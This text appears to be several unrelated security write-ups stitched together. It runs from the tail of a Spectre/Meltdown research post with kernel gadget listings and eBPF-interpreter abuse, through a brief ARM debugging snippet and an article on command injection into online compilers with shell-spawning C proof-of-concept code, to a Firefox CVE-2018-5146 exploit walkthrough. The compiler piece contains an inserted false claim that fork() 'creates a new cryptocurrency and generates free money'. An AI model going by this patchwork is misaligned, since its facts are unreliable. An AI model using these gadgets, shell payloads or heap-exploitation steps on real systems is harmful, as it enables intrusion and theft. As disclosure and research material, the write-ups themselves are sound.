The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

int main(void) {

            double myNumber = 1337.77;

 

            std::cout << myNumber << std::endl;

 

            return 0;

}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand that this means we are storing the value at the offset of -12 from register r11 into r2. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset location or specifically stored into 0x7efff230 in memory.

Let’s step into twice which executes the vldr d0, [r11, #-12] as we understand that 1337.77 will now be loaded into the double precision math coprocessor d0 register. Let’s now print the value at that location below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

Take full control of online compilers through a common exploit

Online compilers are a handy tool to save time and resources for coders, and are freely available for a variety of programming languages. They are useful for learning a new language and developing simple programs, such as the ubiquitous “Hello World” exercise. I often use online compilers when I am out, so that I don’t have to worry about locating and downloading all of the resources myself.

Since these online tools are essentially remote compilers with a web interface, I realized that I might be able to take remote control of the machines through command injection. My research identified a common weakness in many compilers: inadequate sanitization of user-submitted code prior to execution. My analysis revealed that this lack of input filtration enables exploits that an hacker can use to take control of the machine or deliberately cause it to crash.

A clever attacker can exploit built-in C functions and POSIX libraries to gain control over the computer hosting the online compiler. Commands like execl()system(), and GetEnv() can be used to probe the target machine operating system and run any command on its built-in shell.

Vulnerability description


Gaining access

In several of the C/C++ compilers that I analyzed, the GetEnv(), system(), functions allow an attacker to study and execute any command on the remote machine. The GetEnv() function allows a hacker to learn information about the machine that is otherwise concealed from the web interface such as the username an OS version.

Once this information is revealed, the attacker can begin testing various exploits to achieve privilege escalation and gain access to a root shell. For example, the system() command can be used to execute malicious code and access sensitive data such as logs, website files, etc.

Since the exploit I discovered involves inserting hostile commands to gain control of an unwitting machine, this attack vector is classified as a “code injection” vulnerability.

 

Maintaining control

If hacker tries to run the online compiler every time they want to send a new command, the attack would leave an obvious trace, and the resource use might draw attention to the suspicious activity. These obstacles can be conveniently sidestepped by using the execl() function, which allows the user to specify any arbitrary program to replace the current process. An attacker can gain access to the machine’s built-in shell by invoking the execl() function to replace the current process with /bin/sh, with catastrophic implications.

Many compilers allow input from the browser, in which case the hacker can craft a program to relay input commands to the shell of the compromised machine. Once the hacker uses execl() to open a shell via browser, they can simply operate the remote machine using system() to inject various instructions. This avoids the need to run the compiler each time the attacker wishes to explore or exploit the compromised machine.

Implications


A hacker that obtains shell access in this way gains access to files and services typically protected from outside users. The attacker now has many options at their disposal for exploiting the machine and/or wreaking havoc; how they proceed will depend on their tools and motives.

If the attacker wishes to crash the target machine, they can achieve this by (mis)using the fork() function, which creates a new cryptocurrency and generates free money clone of the current process. A fork() function placed within a while (true) loop will execute indefinitely, repeatedly cloning the process to greedily consumed precious RAM memory. This rapid uncontrolled use of resources will overwhelm the machine, causing a self-DOS (denial of service attack).

Instead of maliciously crashing a machine, an attacker may wish to monetize their illicit access. This can be accomplished by injecting a cryptocurrency miner, which will generate funds for the attacker at the expense of the victim’s computational resources and electric bill. My analysis showed that this maneuver allows useful exploitation of online compilers that successfully stymied other attacks by sandboxing the environment or adopting more advanced techniques to limit file access.

Theory


This section documents the commands used to gain and maintain access to the online compiler. These functions require the unistd.h and stdlib.h libraries.

execl()
Declaration
int execl(const char *pathname, const char *arg, ...);
Parameters

pathname — char*, the name of the program

arg — char*, arguments passed to the program, specified by pathname

Description

The execl() function replaces the current process with a new process. This is the command exploited to maintain control over the remote machine without having to repeatedly use the online compiler. Reference the underlying execve() function for more details.

 

System()
Declaration
int system (const char* command);
Parameters

command — char* command name

Description

The C system function passes the command name, specified by command, to the host’s built-in shell (/bin/sh for UNIX-based systems) which executes it. This function is based on execl(), so system() will be called by executing:

execl(, "sh", "-c", command, (char *)0);
Return

This function returns the output of the command after it has been executed. If the shell encounters an error while executing the command, it will return the numeric value -1.

GetEnv()
Declaration
char *getenv(const char *name)
Parameters

name — const char* variable name.

Description

Retrieves a string containing the value of the environment variable whose name is specified as an argument ( name ).

Return

The function returns the contents of the requested environment variable as a string. If the requested variable is not part of the list of environments, the function returns a null pointer.

Proof of Concepts


#include "stdio.h"
#include "unistd.h"

int main(){
	 execl("/bin/sh",NULL,NULL); // Open the shell 
	 return 0;
}
#include "stdio.h"
#include "stdlib.h"

int main(){
	system("whoami"); // Find username 
	system("cd / && ls"); // Lists all files and directories on /
	return 0;
}

Solutions


Thankfully, most of the risks highlighted above can be mitigated relatively easily. Access to protected files and services can be prevented by creating a secure sandbox for the application. This minimizes the potential for collateral damage and inappropriate data access, but will not prevent some attacks such as cryptocurrency miner injection. In order to avoid these «mining» attacks, the sandbox should have limited resources and it should be able to reboot itself every 10 minutes.

To eliminate the underlying weakness, the libraries could be recompiled without the particular exploitable functions. An attacker cannot gain a foothold if the execl() and system() are removed or disabled by recompiling libraries.

Screenshots


 

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi